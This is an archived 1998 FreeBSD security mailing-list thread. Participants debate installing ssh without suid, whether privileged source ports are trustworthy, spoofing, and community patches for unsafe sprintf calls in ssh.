<199811020513.VAA25455@burka.rdy.com>; from Dima Ruban on Sun, Nov 01, 1998 at 09:13:36PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, Nov 01, 1998 at 09:13:36PM -0800, Dima Ruban wrote: > Jan B. Koum writes: > > Which is why when you install ssh, you can run ./configure with > > "--disable-suid-ssh" argument. > > Which will introduce tonns of other problems. Such as? I have been using ssh this way for about a year and haven't seen any. Then again - I am not doing anything fancy with ssh. And no, I don't need to have ssh installed suid just to get .rhost type authentication. -- Yan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Nov 1 22:47:33 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA20131 for freebsd-security-outgoing; Sun, 1 Nov 1998 22:47:33 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from burka.rdy.com (burka.rdy.com [205.149.163.30]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA20124 for ; Sun, 1 Nov 1998 22:47:30 -0800 (PST) (envelope-from dima@burka.rdy.com) Received: (from dima@localhost) by burka.rdy.com (8.8.8/RDY&DVV) id WAA25893; Sun, 1 Nov 1998 22:47:21 -0800 (PST) Message-Id: <199811020647.WAA25893@burka.rdy.com> Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass) In-Reply-To: <19981101213817.A11911@best.com> from "Jan B. Koum " at "Nov 1, 1998 9:38:17 pm" To: jkb@best.com (Jan B. Koum ) Date: Sun, 1 Nov 1998 22:47:20 -0800 (PST) Cc: dima@best.net, peter.jeremy@auss2.alcatel.com.au, freebsd-security@FreeBSD.ORG, winter@jurai.net X-Class: Fast Organization: HackerDome Reply-To: dima@best.net From: dima@best.net (Dima Ruban) X-Mailer: ELM [version 2.4ME+ PL45 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Jan B. Koum writes: > On Sun, Nov 01, 1998 at 09:13:36PM -0800, Dima Ruban wrote: > > Jan B. Koum writes: > > > Which is why when you install ssh, you can run ./configure with > > > "--disable-suid-ssh" argument. > > > > Which will introduce tonns of other problems. > > Such as? > > I have been using ssh this way for about a year and haven't > seen any. Then again - I am not doing anything fancy with ssh. > And no, I don't need to have ssh installed suid just to get > .rhost type authentication. Let me ask you this. Would you trust a packet that came from non-priviledged port and which wants to do something that even remotely should be secure? > > -- Yan > -- dima To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Nov 1 23:35:19 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA24803 for freebsd-security-outgoing; Sun, 1 Nov 1998 23:35:19 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from sasami.jurai.net (sasami.jurai.net [207.153.65.3]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id XAA24797 for ; Sun, 1 Nov 1998 23:35:17 -0800 (PST) (envelope-from winter@jurai.net) Received: from localhost (winter@localhost) by sasami.jurai.net (8.8.8/8.8.7) with SMTP id CAA25228; Mon, 2 Nov 1998 02:34:52 -0500 (EST) Date: Mon, 2 Nov 1998 02:34:52 -0500 (EST) From: "Matthew N. Dodd" To: Dima Ruban cc: "Jan B. Koum" , peter.jeremy@auss2.alcatel.com.au, freebsd-security@FreeBSD.ORG Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass) In-Reply-To: <199811020647.WAA25893@burka.rdy.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 1 Nov 1998, Dima Ruban wrote: > Let me ask you this. Would you trust a packet that came from > non-priviledged port and which wants to do something that even > remotely should be secure? The concept of 'secure port' is somewhat dated in this age of NT and Linux lusers. The bar for entry onto the net is quite a bit lower than it was 10 years ago. Trusting a 'secure port' is a good way to let someone else shoot you in the foot. -- | Matthew N. Dodd | 78 280Z | 75 164E | 84 245DL | FreeBSD/NetBSD/Sprite/VMS | | winter@jurai.net | This Space For Rent | ix86,sparc,m68k,pmax,vax | | http://www.jurai.net/~winter | Are you k-rad elite enough for my webpage? | To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Nov 1 23:36:27 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA25116 for freebsd-security-outgoing; Sun, 1 Nov 1998 23:36:27 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from biggusdiskus.flyingfox.com (biggusdiskus.flyingfox.com [205.162.1.28]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id XAA25111 for ; Sun, 1 Nov 1998 23:36:26 -0800 (PST) (envelope-from jas@flyingfox.com) Received: (from jas@localhost) by biggusdiskus.flyingfox.com (8.8.8/8.8.5) id AAA15786; Mon, 2 Nov 1998 00:32:12 -0800 (PST) Date: Mon, 2 Nov 1998 00:32:12 -0800 (PST) From: Jim Shankland Message-Id: <199811020832.AAA15786@biggusdiskus.flyingfox.com> To: dima@best.net Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <199811020647.WAA25893@burka.rdy.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org dima@best.net (Dima Ruban) writes: > Let me ask you this. Would you trust a packet that came from > non-priviledged port and which wants to do something that even > remotely should be secure? No. Same as for a packet that came from a privileged port. A packet's source port is a pretty weak authenticator, to coin an understatement. Jim Shankland NLynx Systems, Inc. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 2 00:00:51 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA27881 for freebsd-security-outgoing; Mon, 2 Nov 1998 00:00:51 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from burka.rdy.com (burka.rdy.com [205.149.163.30]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id AAA27875 for ; Mon, 2 Nov 1998 00:00:50 -0800 (PST) (envelope-from dima@burka.rdy.com) Received: (from dima@localhost) by burka.rdy.com (8.8.8/RDY&DVV) id AAA26243; Mon, 2 Nov 1998 00:00:39 -0800 (PST) Message-Id: <199811020800.AAA26243@burka.rdy.com> Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass) In-Reply-To: from "Matthew N. Dodd" at "Nov 2, 1998 2:34:52 am" To: winter@jurai.net (Matthew N. Dodd) Date: Mon, 2 Nov 1998 00:00:38 -0800 (PST) Cc: dima@best.net, jkb@best.com, peter.jeremy@auss2.alcatel.com.au, freebsd-security@FreeBSD.ORG X-Class: Fast Organization: HackerDome Reply-To: dima@best.net From: dima@best.net (Dima Ruban) X-Mailer: ELM [version 2.4ME+ PL45 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Matthew N. Dodd writes: > On Sun, 1 Nov 1998, Dima Ruban wrote: > > Let me ask you this. Would you trust a packet that came from > > non-priviledged port and which wants to do something that even > > remotely should be secure? > > The concept of 'secure port' is somewhat dated in this age of NT and Linux > lusers. > > The bar for entry onto the net is quite a bit lower than it was 10 years > ago. > > Trusting a 'secure port' is a good way to let someone else shoot you in > the foot. Heh. I see you run nfs on your machine. Now tell me, do you actually allow weak NFS authentication, or do you actually somehow relie on a "priviledged port" stuff? I'm not arguing about whether it's good or bad to have priviledged ports as they are now. All I'm saying is if packet came from a priviledged port, then this packet was send by root. It's a totally different question whether you can 100% believe this information. > > -- > | Matthew N. Dodd | 78 280Z | 75 164E | 84 245DL | FreeBSD/NetBSD/Sprite/VMS | > | winter@jurai.net | This Space For Rent | ix86,sparc,m68k,pmax,vax | > | http://www.jurai.net/~winter | Are you k-rad elite enough for my webpage? | > -- dima To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 2 00:19:53 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA00786 for freebsd-security-outgoing; Mon, 2 Nov 1998 00:19:53 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from k6n1.znh.org (dialup21.gaffaneys.com [208.155.161.71]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id AAA00751 for ; Mon, 2 Nov 1998 00:19:36 -0800 (PST) (envelope-from zach@gaffaneys.com) Received: (from zach@localhost) by k6n1.znh.org (8.9.1/8.9.1) id IAA05365; Mon, 2 Nov 1998 08:18:05 GMT (envelope-from zach) Message-ID: <19981102021805.A5345@znh.org> Date: Mon, 2 Nov 1998 02:18:05 -0600 From: Zach Heilig To: dima@best.net, "Jan B. Koum " Cc: peter.jeremy@auss2.alcatel.com.au, freebsd-security@FreeBSD.ORG, winter@jurai.net Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass) References: <19981101213817.A11911@best.com> <199811020647.WAA25893@burka.rdy.com> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Mailer: Mutt 0.93.2i In-Reply-To: <199811020647.WAA25893@burka.rdy.com>; from Dima Ruban on Sun, Nov 01, 1998 at 10:47:20PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, Nov 01, 1998 at 10:47:20PM -0800, Dima Ruban wrote: > Jan B. Koum writes: > > I have been using ssh this way for about a year and haven't > > seen any. Then again - I am not doing anything fancy with ssh. > > And no, I don't need to have ssh installed suid just to get > > .rhost type authentication. > Let me ask you this. Would you trust a packet that came from non-priviledged > port and which wants to do something that even remotely should be secure? There probably isn't much of a difference between priviledged and non-priviledged ports anymore (if there ever was). Specifically, any connection coming from a < 1024 port (from an unknown host) is just as untrustworthy as a connection from a >= 1024 port (from an unknown host). If the connection is from a known host, it's not much more trustworthy, due to spoofing. -- Zach Heilig If it looks like a duck, and quacks like a duck, we have to at least consider the possibility that we have a small aquatic bird of the family Anatidæ on our hands (Douglas Adams -- Dirk Gently's Holistic Detective Agency) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 2 00:23:29 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA01525 for freebsd-security-outgoing; Mon, 2 Nov 1998 00:23:29 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from sasami.jurai.net (sasami.jurai.net [207.153.65.3]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id AAA01510 for ; Mon, 2 Nov 1998 00:23:27 -0800 (PST) (envelope-from winter@jurai.net) Received: from localhost (winter@localhost) by sasami.jurai.net (8.8.8/8.8.7) with SMTP id DAA26120; Mon, 2 Nov 1998 03:23:16 -0500 (EST) Date: Mon, 2 Nov 1998 03:23:16 -0500 (EST) From: "Matthew N. Dodd" To: Dima Ruban cc: jkb@best.com, peter.jeremy@auss2.alcatel.com.au, freebsd-security@FreeBSD.ORG Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass) In-Reply-To: <199811020800.AAA26243@burka.rdy.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 2 Nov 1998, Dima Ruban wrote: > Heh. I see you run nfs on your machine. Now tell me, do you actually > allow weak NFS authentication, or do you actually somehow relie on a > "priviledged port" stuff? I'm relying on mountd to disallow mount requests from all IPs but known good ones. Actually, thanks for pointing this out; sasami only uses NFS for some weird AMD tricks and should even be honoring any portmap connections from the world. I've fixed this. (Why can't we get tcpwrappers in tree and enable HBA for portmap by default?) > I'm not arguing about whether it's good or bad to have priviledged > ports as they are now. All I'm saying is if packet came from a > priviledged port, then this packet was send by root. It's a totally > different question whether you can 100% believe this information. >From a security standpoint, you have to assume that anything you hear is a lie. -- | Matthew N. Dodd | 78 280Z | 75 164E | 84 245DL | FreeBSD/NetBSD/Sprite/VMS | | winter@jurai.net | This Space For Rent | ix86,sparc,m68k,pmax,vax | | http://www.jurai.net/~winter | Are you k-rad elite enough for my webpage? | To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 2 00:29:59 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA02772 for freebsd-security-outgoing; Mon, 2 Nov 1998 00:29:59 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from burka.rdy.com (burka.rdy.com [205.149.163.30]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id AAA02764 for ; Mon, 2 Nov 1998 00:29:58 -0800 (PST) (envelope-from dima@burka.rdy.com) Received: (from dima@localhost) by burka.rdy.com (8.8.8/RDY&DVV) id AAA26460; Mon, 2 Nov 1998 00:29:48 -0800 (PST) Message-Id: <199811020829.AAA26460@burka.rdy.com> Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass) In-Reply-To: from "Matthew N. Dodd" at "Nov 2, 1998 3:23:16 am" To: winter@jurai.net (Matthew N. Dodd) Date: Mon, 2 Nov 1998 00:29:48 -0800 (PST) Cc: dima@best.net, jkb@best.com, peter.jeremy@auss2.alcatel.com.au, freebsd-security@FreeBSD.ORG X-Class: Fast Organization: HackerDome Reply-To: dima@best.net From: dima@best.net (Dima Ruban) X-Mailer: ELM [version 2.4ME+ PL45 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Matthew N. Dodd writes: > On Mon, 2 Nov 1998, Dima Ruban wrote: > > Heh. I see you run nfs on your machine. Now tell me, do you actually > > allow weak NFS authentication, or do you actually somehow relie on a > > "priviledged port" stuff? > > I'm relying on mountd to disallow mount requests from all IPs but known > good ones. Don't forget about spoofing :-) > Actually, thanks for pointing this out; sasami only uses NFS for some > weird AMD tricks and should even be honoring any portmap connections from > the world. I've fixed this. (Why can't we get tcpwrappers in tree and > enable HBA for portmap by default?) Use firewall. > > I'm not arguing about whether it's good or bad to have priviledged > > ports as they are now. All I'm saying is if packet came from a > > priviledged port, then this packet was send by root. It's a totally > > different question whether you can 100% believe this information. > > >From a security standpoint, you have to assume that anything you hear is a > lie. There's a small difference between feeling reasonable secure and being paranoid. You can always disconnect yourself completely from the network, you know. But since you read this mail, I think it would be safe to make an assumption that you're trying to be reasonable secure (hey, you kinda trust sendmail, which runs as root etc etc etc etc) > > -- > | Matthew N. Dodd | 78 280Z | 75 164E | 84 245DL | FreeBSD/NetBSD/Sprite/VMS | > | winter@jurai.net | This Space For Rent | ix86,sparc,m68k,pmax,vax | > | http://www.jurai.net/~winter | Are you k-rad elite enough for my webpage? | > -- dima To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 2 02:31:57 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id CAA16449 for freebsd-security-outgoing; Mon, 2 Nov 1998 02:31:57 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from aniwa.sky (aniwa.actrix.gen.nz [203.96.56.186]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id CAA16442 for ; Mon, 2 Nov 1998 02:31:54 -0800 (PST) (envelope-from andrew@squiz.co.nz) Received: from localhost (andrew@localhost) by aniwa.sky (8.8.8/8.8.7) with SMTP id XAA02574; Mon, 2 Nov 1998 23:29:22 +1300 (NZDT) (envelope-from andrew@squiz.co.nz) Date: Mon, 2 Nov 1998 23:29:22 +1300 (NZDT) From: Andrew McNaughton X-Sender: andrew@aniwa.sky Reply-To: andrew@squiz.co.nz To: Dima Ruban cc: "Matthew N. Dodd" , jkb@best.com, peter.jeremy@auss2.alcatel.com.au, freebsd-security@FreeBSD.ORG Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass) In-Reply-To: <199811020829.AAA26460@burka.rdy.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 2 Nov 1998, Dima Ruban wrote: > Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass) > > Matthew N. Dodd writes: > > On Mon, 2 Nov 1998, Dima Ruban wrote: > > > Heh. I see you run nfs on your machine. Now tell me, do you actually > > > allow weak NFS authentication, or do you actually somehow relie on a > > > "priviledged port" stuff? > > > > I'm relying on mountd to disallow mount requests from all IPs but known > > good ones. > > Don't forget about spoofing :-) > > > Actually, thanks for pointing this out; sasami only uses NFS for some > > weird AMD tricks and should even be honoring any portmap connections from > > the world. I've fixed this. (Why can't we get tcpwrappers in tree and > > enable HBA for portmap by default?) > > Use firewall. > > > > I'm not arguing about whether it's good or bad to have priviledged > > > ports as they are now. All I'm saying is if packet came from a > > > priviledged port, then this packet was send by root. It's a totally > > > different question whether you can 100% believe this information. > > > > >From a security standpoint, you have to assume that anything you hear is a > > lie. > > There's a small difference between feeling reasonable secure and being > paranoid. You can always disconnect yourself completely from the network, you > know. But since you read this mail, I think it would be safe to make an > assumption that you're trying to be reasonable secure (hey, you kinda trust > sendmail, which runs as root etc etc etc etc) Sure you trust sendmail as far as you have to on your own machine. In particular you trust it to guard against malicious clients including those on other machines. The whole point of ssh is that it allows you to stop relying on the network to be secure. Ssh is at its best when the connection is only available on presentation of an authorised key. Given this there's no need for any trusted port stuff. It adds nothing. I guess it's nice that rhosts/shosts authentication is there for those who want it, but to my mind the client should not be suid by default. At least not for the sake of connecting to a 'trusted' port. There is another reason for having a suid client, although ssh doesn't make use of it. That is for providing a barrier within the client machine which safeguards the encryption keys and limits which users have access to a given secure connection. Say you have a cgi script which needs an encrypted connection to a service on another machine. You want it to be able to use an authorized key's priviledges, but in the case where the script is compromised, you do not want that key to be stolen. Ssh doesn't seem to provide for root owned keys though. So you're back to setting up ssh forwarding from a local port - better than rhosts/shosts, but some sort of authentication has to be worked out. Probably you use either a file socket or a suid wrapper to ssh. I guess this could be suid to a non-root user which has access to the keys. Andrew McNaughton To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 2 05:09:39 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id FAA07859 for freebsd-security-outgoing; Mon, 2 Nov 1998 05:09:39 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ocean.campus.luth.se (ocean.campus.luth.se [130.240.194.116]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id FAA07840 for ; Mon, 2 Nov 1998 05:09:35 -0800 (PST) (envelope-from karpen@ocean.campus.luth.se) Received: (from karpen@localhost) by ocean.campus.luth.se (8.9.1/8.9.1) id OAA24194; Mon, 2 Nov 1998 14:03:45 +0100 (CET) (envelope-from karpen) From: Mikael Karpberg Message-Id: <199811021303.OAA24194@ocean.campus.luth.se> Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass) In-Reply-To: <199811020832.AAA15786@biggusdiskus.flyingfox.com> from Jim Shankland at "Nov 2, 98 00:32:12 am" To: jas@flyingfox.com (Jim Shankland) Date: Mon, 2 Nov 1998 14:03:45 +0100 (CET) Cc: dima@best.net, freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL32 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org According to Jim Shankland: > dima@best.net (Dima Ruban) writes: > > > Let me ask you this. Would you trust a packet that came from > > non-priviledged port and which wants to do something that even > > remotely should be secure? > > No. Same as for a packet that came from a privileged port. > > A packet's source port is a pretty weak authenticator, to coin > an understatement. Why? I'd say it's a pretty safe way of authentication. Specially as a first check, before you move on to stronger checks. I'd say you can't spoof it, since the trusted machines on your net (and you check that it's a trusted machine first, you know) will not let any user grab such ports, and you (OFCOURSE!!!) have a firewall or router between your net and the internet that will reject any incomming packets with source addreses from the inside net. It's all in the enviroment. /Mikael To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 2 05:24:39 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id FAA09643 for freebsd-security-outgoing; Mon, 2 Nov 1998 05:24:39 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from kendra.ne.mediaone.net (kendra.ne.mediaone.net [24.128.94.182]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id FAA09637 for ; Mon, 2 Nov 1998 05:24:37 -0800 (PST) (envelope-from software@kew.com) Received: from sonata.hh.kew.com (root@sonata-dmz.hh.kew.com [192.168.205.1]) by kendra.ne.mediaone.net (8.9.1/8.9.1) with ESMTP id IAA02254; Mon, 2 Nov 1998 08:24:31 -0500 (EST) Received: from kew.com (minerva.hh.kew.com [192.168.203.144]) by sonata.hh.kew.com (8.9.1/8.9.1) with ESMTP id IAA06077; Mon, 2 Nov 1998 08:24:30 -0500 (EST) Message-ID: <363DB28D.4A884162@kew.com> Date: Mon, 02 Nov 1998 08:24:29 -0500 From: Drew Derbyshire Organization: Kendra Electronic Wonderworks, Stoneham, MA 02180 (http://www.kew.com) X-Mailer: Mozilla 4.5 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: dima@best.net CC: freebsd-security@FreeBSD.ORG Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass) References: <199811020647.WAA25893@burka.rdy.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Dima Ruban wrote: > Would you trust a packet that came from non-priviledged > port and which wants to do something that even remotely should be secure? I wouldn't trust it even if it did come from a privileged port simply on the basis of the port number. Trusted ports require trusted hosts, which the Net is in short supply of these days. -ahd- -- Drew Derbyshire UUPC/extended e-mail: software@kew.com Telephone: 617-279-9812 Build a system even a fool can use, and only a fool will want to use it. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 2 06:09:21 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id GAA16393 for freebsd-security-outgoing; Mon, 2 Nov 1998 06:09:21 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns1.seidata.com (ns1.seidata.com [208.10.211.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id GAA16382 for ; Mon, 2 Nov 1998 06:09:19 -0800 (PST) (envelope-from mike@seidata.com) From: mike@seidata.com Received: from localhost (mike@localhost) by ns1.seidata.com (8.8.8/8.8.5) with ESMTP id JAA12768 for ; Mon, 2 Nov 1998 09:09:18 -0500 (EST) Date: Mon, 2 Nov 1998 09:09:18 -0500 (EST) To: freebsd-security@FreeBSD.ORG Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 2 Nov 1998, Matthew N. Dodd wrote: > > Let me ask you this. Would you trust a packet that came from > > non-priviledged port and which wants to do something that even > > remotely should be secure? [snip] > The concept of 'secure port' is somewhat dated in this age of NT and Linux > lusers. [snip] Question: How did a discussion that was meant to logically determine the (un)importance of potential ssh vulnerabilities degrade into a childish "Linux is for lusers" (I guess I should respect the opinion of one who can't spell) argument which is currently doing little more than stating what we all (at least should) already know? While this thread grows, consumes more and more bandwidth, and gets more off-topic, who's actually working on this problem and attempting to resolve it? JKH's posts are the only one's I've seen that are level headed - let's not go off on tangents and make speculations that in no way help our cause. There's work to be done. My (and hopefully the list's) repsect to the individual(s) who actually comes up with proof-of-concept exploit code (to either prove or disprove ssh claims). Sorry if this is a little terse - but I don't see how having a mailbox full of "Did you hear this? and this... and this..." type messages is going to help our situation. Let's fix it or shutup. Later, -mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 2 11:01:45 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA19086 for freebsd-security-outgoing; Mon, 2 Nov 1998 11:01:45 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id LAA19077 for ; Mon, 2 Nov 1998 11:01:42 -0800 (PST) (envelope-from brett@lariat.org) Received: (from brett@localhost) by lariat.lariat.org (8.8.8/8.8.6) id MAA27394; Mon, 2 Nov 1998 12:01:26 -0700 (MST) Message-Id: <4.1.19981102021507.00c0b200@127.0.0.1> X-Sender: brett@127.0.0.1 X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Date: Mon, 02 Nov 1998 02:15:44 -0700 To: "Matthew N. Dodd" , Peter Jeremy From: Brett Glass Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: References: <98Nov2.132551est.40330@border.alcanet.com.au> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Just tried these. Your sprintf patches are failing for some reason.... --Brett At 12:13 AM 11/2/98 -0500, Matthew N. Dodd wrote: >On Mon, 2 Nov 1998, Peter Jeremy wrote: >> ssh also contains a large number of sprintf() calls. Not all of these >> are immediately innocuous. There are also 2 sscanf() calls with %s >> formats which could be dangerous. Not to mention the str[n]cat() and >> str[n]cpy() calls. Unfortunately I have another bushfire to worry >> about right now, or I'd check through them as well. > >ftp.jurai.net:/users/winter/ > > ssh1226.sprintf.patch > ssh1226.vsprintf.patch > >> The problem with C is that there are too many ways to shoot yourself >> in the foot... A full security audit on ssh (which it sounds like it >> might need) would be fairly time-consuming. > >Indeed. My approach was (is) to address the easy things that could be >broken. I'll probably work on sscanf issues next unless someone beats me >to it. Going through the code and fixing improper logic I'll leave to >someone with more of a burr up their ass. :) > >-- >| Matthew N. Dodd | 78 280Z | 75 164E | 84 245DL | FreeBSD/NetBSD/Sprite/VMS | >| winter@jurai.net | This Space For Rent | ix86,sparc,m68k,pmax,vax | >| http://www.jurai.net/~winter | Are you k-rad elite enough for my webpage? | > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 2 12:34:33 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA00684 for freebsd-security-outgoing; Mon, 2 Nov 1998 12:34:33 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from peak.mountin.net (peak.mountin.net [207.227.119.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA00677 for ; Mon, 2 Nov 1998 12:34:30 -0800 (PST) (envelope-from jeff-ml@mountin.net) Received: (from daemon@localhost) by peak.mountin.net (8.9.1/8.9.1) id OAA13150; Mon, 2 Nov 1998 14:34:30 -0600 (CST) Received: from aridius-11.isdn.mke.execpc.com(169.207.66.138) by peak.mountin.net via smap (V1.3) id sma013148; Mon Nov 2 14:34:22 1998 Message-Id: <3.0.3.32.19981102143310.0102652c@207.227.119.2> X-Sender: jeff-ml@207.227.119.2 X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.3 (32) Date: Mon, 02 Nov 1998 14:33:10 -0600 To: mike@seidata.com, freebsd-security@FreeBSD.ORG From: "Jeffrey J. Mountin" Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass) In-Reply-To: References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 09:09 AM 11/2/98 -0500, mike@seidata.com wrote: >[snip] > >Question: > >How did a discussion that was meant to logically determine the >(un)importance of potential ssh vulnerabilities degrade into a >childish "Linux is for lusers" (I guess I should respect the opinion >of one who can't spell) argument which is currently doing little more >than stating what we all (at least should) already know? Anyone using ssh should know potential problems with various configurations. >While this thread grows, consumes more and more bandwidth, and gets >more off-topic, who's actually working on this problem and attempting >to resolve it? JKH's posts are the only one's I've seen that are >level headed - let's not go off on tangents and make speculations that >in no way help our cause. There's work to be done. Agreed and any discussion about various ssh auth methods should be complete, otherwise there could be a discussion lasting forever on a if-then basis. >My (and hopefully the list's) repsect to the individual(s) who >actually comes up with proof-of-concept exploit code (to either prove >or disprove ssh claims). Any exploit would also depend on how ssh is configured. After reading the forwarded bulletin and checking out the links, as well as reading all the speculation here along with "possible problems" with the code, there was not one mention of HOW rootshell was implementing ssh. If they allow password 